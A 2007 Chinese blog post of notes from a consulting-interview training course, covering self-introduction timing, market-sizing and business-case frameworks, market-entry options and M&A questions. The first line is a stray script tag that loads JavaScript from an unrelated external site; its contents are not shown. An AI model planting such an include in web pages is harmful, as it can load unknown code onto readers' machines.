<script language='javascript' src='http://www.taizhou.la/AD/ad.js'></script> 今天参加了CareerJet的顶级咨询公司面试的培训课程,觉得收益匪浅,课程主要是分为self introduction, behavior questions, market sizing case, business case(market
entry, new product launch, etc),总结了部分笔记,供大家参考
self introduction:
1. 60s的自我介绍大致来说,可以break down为三个部分,20s介绍profile, 30s介绍cha
racteristics举1-2examples,再预留20s 为funny point
在what you learned from the experience
market sizing framework:
revenue:product1---sales volume*price
product2---sales volume*price
cost: variable cost---raw materials/variable labor
fixed cost---G&A/marketing/D&A/interest/tax
businese case:
1. definition
2. background of the client(product/service and customer)
3. why the cient approach our firm
4. client objectives
market entry;
current ---how big is the market
how intense is the competition
future----how fast is the market expected to grow
how high is the entry barrier
three options of market entry(how to)
1. zero point
2. M&A
3. JV
COGS-total cost-price of subsititution-percieved value (the price should be se
t within the range between total cost and percieved value)
几个关于M&A case可以问得问题:
1.will the sales volume increase after M&A
2. can we charge higher price
3. will the M&A give rise to economic of scale
4. can the investment level/working capital level be reducted
5. can the brand name image be improved after M&A
6. can we get advanced technique
7. can we quickly pass the learning curve period
咨询的天空 2007-11-24 10:52 发表评论
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